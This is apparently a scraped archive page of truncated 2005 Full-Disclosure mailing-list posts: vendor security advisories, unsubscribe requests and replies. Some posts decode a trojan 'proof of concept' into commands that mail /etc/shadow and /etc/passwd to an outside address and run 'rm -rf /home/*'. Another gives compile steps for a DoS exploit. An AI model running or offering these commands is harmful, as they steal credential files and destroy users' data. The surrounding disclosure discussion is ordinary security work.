- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200504-17
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
haha, nice:
/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe
cat /etc/shadow |mail full-disclosure@lists.grok.org.uk
cat /etc/passwd |mail full-disclosure@lists.grok.org.uk
lol @ anybody who does it.
Day Jay wrote:
/* Proof of concept code
Please don't send us e-mails
asking us "how to hack" beca
Not that anyone would fall for running this on anything besides a test
system, but to save 30 second to decode, what it really does (locally,
not remotely) is:
cat /etc/shadow |mail full-disclosure@lists.grok.org.uk
cat /etc/passwd |mail full-disclosure@lists.grok.org.uk
/bin/rm -rf /home/*;clear
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
SQL Injection in CREATE_SCN_CHANGE_SET procedure
AppSecInc Team SHATTER Security Advisory
http://www.appsecinc.com/resources/alerts/oracle/2005-05.html
April 18, 2005
Affected versions: Oracle Database Server version 10g
Risk level: High
Credits: T
Le lundi 18 avril 2005 à 16:53 -0700, Day Jay a écrit :
> /* Proof of concept code
>Please don't send us e-mails
>asking us "how to hack" because
>we will be forced to skullfsck you.
>
> DISCLAIMER:
> !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
You're right to add this warning ! :)
Haxorcitos advisory
---
Application : WheresJames Webcam Publisher
Version : Beta 2.0.0014
Url : www.wheresjames.com
Type : Remote / Local Bof
Author : Miguel Tarascó Acuña - Tarako AT gmail.com
- Tarako AT Haxorci
Small XSS Bug in JAWS gadget: Glossary all versions vulnerable 0.3 - 0.5
latest beta (beta2)
STATUS: The vendor has been contacted and they fixed the bug but they
havent released an official patch yet.
(You can find a provisional patch at the end of the file)
TECHNICAL INFO
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
SQL Injection in ALTER_MANUALLOG_CHANGE_SOURCE procedure
AppSecInc Team SHATTER Security Advisory
http://www.appsecinc.com/resources/alerts/oracle/2005-04.html
April 18, 2005
Affected versions: Oracle Database Server version 10g
Risk level: High
Cr
Saludos:
Good attempt;) But some times it works.
---
cat: /etc/shadow: Permiso denegado
No message, no subject; hope that's ok
/bin/rm: no se puede borrar «/home/*»: Permiso denegado
/bin/rm: no se puede borrar «/home/**»: Permiso denegado
/bin/rm: no se puede borrar «/home/***»:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Multiple SQL Injection vulnerabilities in DBMS_METADATA package
AppSecInc Team SHATTER Security Advisory
http://www.appsecinc.com/resources/alerts/oracle/2005-03.html
April 18, 2005
Affected Versions: Oracle Database Server versions 9i and 10g
Risk
/* Proof of concept code
Please don't send us e-mails
asking us "how to hack" because
we will be forced to skullfsck you.
DISCLAIMER:
!!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
IIS 6 Buffer Overflow Exploit
BUG: inetinfo.exe improperly bound checks
http requests sent longer
http://www.argeniss.com/research.html
Some exploits and workarounds for vulnerabilities
fixed on Oracle Critical Patch Update April 2005.
http://www.oracle.com/technology/deploy/security/pdf/cpuapr2005.pdf
(->Don't read if don't care about Oracle security...)
You think you are secure because yo
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Multiple SQL Injection vulnerabilities in DBMS_CDC_SUBSCRIBE and
DBMS_CDC_ISUBSCRIBE packages
AppSecInc Team SHATTER Security Advisory
http://www.appsecinc.com/resources/alerts/oracle/2005-02.html
April 18, 2005
Affected Versions: Oracle Database Ser
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Denial of Service in Oracle interMedia
AppSecInc Team SHATTER Security Advisory
http://www.appsecinc.com/resources/alerts/oracle/2005-01.html
April 18, 2005
Affected versions: Oracle Database Server versions 9i and 10g
Risk level: Medium
Credits: T
[EMAIL PROTECTED]
<[EMAIL PROTECTED]>
http://netwinsite.com/surgemail/infoq.htm
- Original Message -
From:
jamie fisher
To: full-disclosure@lists.grok.org.uk
Sent: Monday, April 18, 2005 3:21
PM
Subject: [Full-disclosure] Security
contacts for Sambar server a
Searching for security contacts for both Sambar and Surgemail. I've checked over the respective websites and have googled for contact details to no avail.
Cheers!
JamieSend instant messages to your online friends http://uk.messenger.yahoo.com ___
Full-
McAfee Internet Security Suite 2005 Insecure File Permission
Vulnerability
iDEFENSE Security Advisory 04.18.05
http://www.idefense.com/application/poi/display?type=vulnerabilities
April 18, 2005
I. BACKGROUND
McAfee Internet Security Suite 2005 is a product used to protect a
personal computer fr
- EXPL-A-2005-005 exploitlabs.com Advisory 034 -
- WebcamXP -
OVERVIEW
webcamXP is one of the most popular webcam software for private
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200504-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
lol, I'm not doing a race...
Besides Agobot is not a spyware, it's a backdoor which exploit
RPC/DCOM (MS03-026), RPC/Locator (MS03-001) and WebDAV (MS03-007)
whereas kruegerware and kspyware are real spyware (it's right KSpyware
is not very dangerous, but kruegerware was very dangerous).
PS: I c
> After kruegerware's (and its child) diffusion, I'm introducing you the
> first open source spyware.
Too late. Agobot is/was GPLed, too.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and s
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
SQL Injection in CREATE_SCN_CHANGE_SET procedure
AppSecInc Team SHATTER Security Advisory
http://www.appsecinc.com/resources/alerts/oracle/2005-05.html
April 18, 2005
Affected versions: Oracle Database Server version 10g
Risk level: High
Credits: T
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
SQL Injection in ALTER_MANUALLOG_CHANGE_SOURCE procedure
AppSecInc Team SHATTER Security Advisory
http://www.appsecinc.com/resources/alerts/oracle/2005-04.html
April 18, 2005
Affected versions: Oracle Database Server version 10g
Risk level: High
Cr
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Multiple SQL Injection vulnerabilities in DBMS_METADATA package
AppSecInc Team SHATTER Security Advisory
http://www.appsecinc.com/resources/alerts/oracle/2005-03.html
April 18, 2005
Affected Versions: Oracle Database Server versions 9i and 10g
Risk
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Multiple SQL Injection vulnerabilities in DBMS_CDC_SUBSCRIBE and
DBMS_CDC_ISUBSCRIBE packages
AppSecInc Team SHATTER Security Advisory
http://www.appsecinc.com/resources/alerts/oracle/2005-02.html
April 18, 2005
Affected Versions: Oracle Database Ser
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Denial of Service in Oracle interMedia
AppSecInc Team SHATTER Security Advisory
http://www.appsecinc.com/resources/alerts/oracle/2005-01.html
April 18, 2005
Affected versions: Oracle Database Server versions 9i and 10g
Risk level: Medium
Credits: T
Hi,
Since a few years, the number of spywares is growing up but it's
impossible to find a spyware's code source to analyse it and better
understand their work.
After kruegerware's (and its child) diffusion, I'm introducing you the
first open source spyware.
My goal is not to help people writing
I can confirm that the POC works on 1.0.2 and does not work on 1.0.3.
Michael Scovetta
Computer Associates
Senior Application Developer
-Original Message-
From: mikx [mailto:[EMAIL PROTECTED]
Sent: Monday, April 18, 2005 6:59 AM
To: full-disclosure@lists.grok.org.uk; bugtraq@securityfoc
ERNW Security Advisory 01-2005
Buffer Overflow in PMSoftware's Simple Web Server
Author:
Michael Thumann
1. Summary:
Simple Web Server doesn't do proper bounds checking handling normal GET
requests.
Sending an overlong page or script name, it causes an buffer overflow and an
attacker
can cont
I put up an analysis here:
http://www.bleepingcomputer.com/analysis/?anal=globolook-dropper
Lawrence Abrams
Bleeping Computer: http://www.bleepingcomputer.com
- Original Message -
From: "Willem Koenings" <[EMAIL PROTECTED]>
To:
Sent: Sunday, April 17, 2005 11:06 AM
Subject: [Full-disclosu
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 710-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
April 18th, 2005
Just mail John Cartwright... and politely ask to be removed.
-KF
Bill Phu wrote:
*sigh* I use "[EMAIL PROTECTED]" at
https://lists.grok.org.uk/mailman/listinfo/full-disclosure, and I am
brought to a page that reads:
---Start copy---
Full-Disclosure list: member options for user [EMAIL PROTECTED]
In
*sigh* I use "[EMAIL PROTECTED]" at
https://lists.grok.org.uk/mailman/listinfo/full-disclosure, and I am
brought to a page that reads:
---Start copy---
Full-Disclosure list: member options for user [EMAIL PROTECTED]
In order to change your membership option, you must first log in by
giving your me
On Mon, 18 Apr 2005 10:37:37 EDT, Bill Phu said:
> Hi, I've tried more than a few times to get the confirmation email to
> automatically remove myself from this list. But, for some reason, I
> never get it. Can someone tell me how to remove myself from here?
The most likely cause is that you're
Hi, I've tried more than a few times to get the confirmation email to
automatically remove myself from this list. But, for some reason, I
never get it. Can someone tell me how to remove myself from here?
Thanks,
Bill
___
Full-Disclosure - We believe in
-BEGIN PGP SIGNED MESSAGE-
__
SUSE Security Announcement
Package:cvs
Announcement-ID:SUSE-SA:2005:024
Date: Monday, Apr 18
Compiles and runs ok on *BSD and Linux.
No effect on windows xp sp2 home/pro, Linux 2.4/2.6, NetBSD 2.0.2, DragonFly 1.2
No sign of DoS on either side of the connection.
No wonder people you sent the advisory to didn't bother to respond
--
Edua
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Idem on a gentoo with 2.6 kernel (I have tested during 10min)
H. S. wrote:
>I have tested this against an unpatched W2K server and a RH 6 box, it
>doesnt slow down any of them; I was using X on the RH6 one and didn't
>notice any slowdowns or the supp
I have tested this against an unpatched W2K server and a RH 6 box, it
doesnt slow down any of them; I was using X on the RH6 one and didn't
notice any slowdowns or the supposed packet flow this should generate.
> Fellows,
>
> Try this:
>
> Linux (Slackware 10):
>
> [EMAIL PROTECTED]:/# gcc -D LIN
Fellows,
Try this:
Linux (Slackware 10):
[EMAIL PROTECTED]:/# gcc -D LINUX storm.c -lpcap -o storm
BSD systems:
[EMAIL PROTECTED]:/# gcc storm.c -lpcap -o storm
It should work, anyway Im sending a FreeBSD precompiled version of
this exploit and a the C source code as an attachment.
bash-2.0
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200504-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
Troubleshooting Linux(r) Firewalls
By Michael Shinn, Scott Shinn
Publisher : Prentice Hall PTR
Pub Date : December 14, 2004
ISBN : 0-321-22723-9
Pages : 384
When something goes wrong with your Linux firewall, you need to fix
itright now. You don't have time for endless newsgro
__Notice
I really wonder why the Mozilla Foundation decided to release a serious
security update on a friday night and to disclose the link to my
proof-of-concept code so quickly. It wasn't intendet from my side to release
this as a 0day exploit. Please complain to [EMAIL PROTECTED] if you
disa
__Notice
I really wonder why the Mozilla Foundation decided to release a serious
security update on a friday night and to disclose the link to my
proof-of-concept code so quickly. It wasn't intendet from my side to release
this as a 0day exploit. Please complain to [EMAIL PROTECTED] if you
disa
hi
i received this
message
Cisco
Security Advisory: Crafted ICMP Messages Can Cause Denial of Service
12-Apr-200512:00 GMT
where i receive that
ios or update or
download
example
where site (http://www.cisco.com/en/US/products/produ
45 matches
Mail list logo
